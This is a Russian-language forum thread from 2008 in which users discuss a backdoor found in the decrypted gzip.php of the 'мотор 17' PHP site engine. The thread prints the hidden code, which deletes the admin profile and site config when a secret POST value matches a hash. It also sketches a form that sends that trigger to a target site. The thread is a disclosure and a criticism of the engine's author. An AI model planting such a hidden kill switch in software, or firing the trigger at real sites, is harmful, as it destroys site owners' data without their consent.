Последняя активность
Бэкдоры мотора 17 !!! | Падонагъ [Off] [#] (17.02.2008 / 19:19)
|
Камрады,в соседнем разделе всплыла инфа,в расшифрованном файле gzip.php ( спасибо камраду def) обнаружены такие строки:
if(md5(md5(md5($_POST['log'])))=="94beb4eddd1ca52274be3b95cb3c1b1b"){
unlink (BASEDIR."local/profil/$config_nikname.prof");
unlink (BASEDIR."local/config.dat");
unset($_POST['log'],$_POST['par']);
header ("Location: ".BASEDIR."index.php?".SID);
exit;
то есть по русски-
Если
{тройной мд5 хэш от значения элемента с ключом log ,переданного в массиве $_POST, равен 94beb4eddd1ca52274be3b95cb3c1b1b
}
удалить профиль админа этого сайта;
удалить файл с настройами сайта;
уничтожить элементы пост массива (хз наверно следы замести);
перенаправить на главную( полюбоваться на дело рук своих гГг);
так то ,девочки и мальчики
Дааа, дожились. Ужос.
Но пихать бэкдоры - это реальня подлянка.
| Падонагъ [Off] [#] (17.02.2008 / 19:36)
|
то есть представьте себе файл к примеру visavi.net/pizdec/index.php с примерно следующим содержымым:
<?php
echo "<form action='адрес_сайта/index.php' method='post'>
<input type='hidden' name='log' value='кое_что' />
<input type='submit' value='Убить сайт' /></form>";
?>
который сто пудов существует. Видимо он создан для того чтоб гробить сайты,на которых сняли бесплатно копирайт. Но!!! Вредоносный код содержыцца ф каждом сайте где установлен мотор 17 ! Каково владельцам этих сайтов будет узнать, что в любой момент откуда то извне могут уничтожыть их сайт,в который было вложено немало труда,и возможно средств?? При чом это сможет сделать не только Вантуз, а любой кто подберет необходимое значение этой переменной
Изм. Падонагъ (17.02.2008 / 19:37) [1] | Падонагъ [Off] [#] (17.02.2008 / 19:43)
|
вообщем, братва,думайте сами... Ваше дело ждать ли выход нового мотора и ставить ли его. Ну а Вантуз полностью потеряет доверие юзеров. Так вещи не делаются.На его месте я бы бросил писать,ушел бы из инета и спрятался чтоб меня не нашли...
| МихалЫч [Off] [#] (17.02.2008 / 20:38)
|
Жек, палюбак прально мыслишь...
| Rarih [Off] [#] (17.02.2008 / 20:45)
|
Ебать мой хуй...
| Piks [Off] [#] (17.02.2008 / 21:14)
|
Мда, я не ожидал такого.. Пиздец =//
Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально. Мне уже пох что они с этим мотором сделают
| matis4e [Off] [#] (17.02.2008 / 21:49)
|
жадность в реале убивает все человеческое. Но он бы один до этого не дошел бы, кто то подполкнул его на ето. Фу бля. В тихом омуте мрази живут.
| Piks [Off] [#] (17.02.2008 / 21:51)
|
Дык слышал, что некий BWC эту систему шифрования придумал
| StalKeR [Off] [#] (17.02.2008 / 22:07)
|
принцип шифровани походу был взят из дле(там тоже eval(base64_decode());
| йогин [Off] [#] (17.02.2008 / 22:14)
|
а где можно скачать раскодированный 17 мотор?
| Падонагъ [Off] [#] (17.02.2008 / 22:16)
|
а нахуй он тебе нужен? Тут ребята файлы расшифровали,у них спроси
| МихалЫч [Off] [#] (17.02.2008 / 23:37)
|
Piks(17.02.2008/15:14):" ...Но всеравно, у меня уже даверие к мотору отпало с выходом 16 версии, непонрвился мне он изначально... "Если честно... мине также... только поставил и сразу удалил, зря трафик спалил только... самая удачная версия это 15.7 ИМХО
| Борман [Off] [#] (18.02.2008 / 00:15)
|
гггг вот прикол! Маладец Вантуз што патстрахавался и трайным мд5 код этат защитил! иво практически ниразгадать типерь. мы далжны васхвалять иво типерь за такие прадуманные паступки! гггг интиресно при устанофке матора 17 скрипт нешлёт инфу а сцайте где он установлен и на автаматическую праверку капирайта? а то чо зря траф. палить... сиди сибе и удаляй сцайты! гггг нихарашо такаг! абалдеть....
| NEMO [Off] [#] (18.02.2008 / 00:16)
|
Гг. Мля, уже второй день читаю и тихо охуеваю со всего происходящего. Но бэкдор это уже чересчур. Интересно, что в зашифрованных файлах еще припасено?
| Monstr [Off] [#] (18.02.2008 / 00:35)
|
Джон, а шо ты мне сказал про бэкдоры когда я про чат мотора спрашивал?

Мля вот это жестко санек резанул
Изм. Monstr (18.02.2008 / 00:35) [1] | Inferpse [Off] [#] (18.02.2008 / 00:51)
|
гг, а я от делать нефиг кейген сделал ))
ппц он конечно гонит: чтоб расшифровать файл, надо столько проходов и операций сделать, а учитывая то, что почти в каждой странице мотора инклудится несколько таких шифрованых файлов, то грузит это серв нехило.
Кстати вантуз не придумывал алгоритм шифрования - есть прога походу "TrueBug PHP Encoder" - вот она таким макаром шифрует, только gzip.php руками закодирован был. Бэкдор обидно - в ответ на это можно спокойно копирайты снимать :\
| NEMO [Off] [#] (18.02.2008 / 01:25)
|
Бугага. На Визави была тема про бэкдор(автора не успел посмотреть) Снесли нах.
| Inferpse [Off] [#] (18.02.2008 / 01:26)
|
Она уже не первая такая тема на визави..)

Всего: 58
Скачать темуФорум
Новые вверху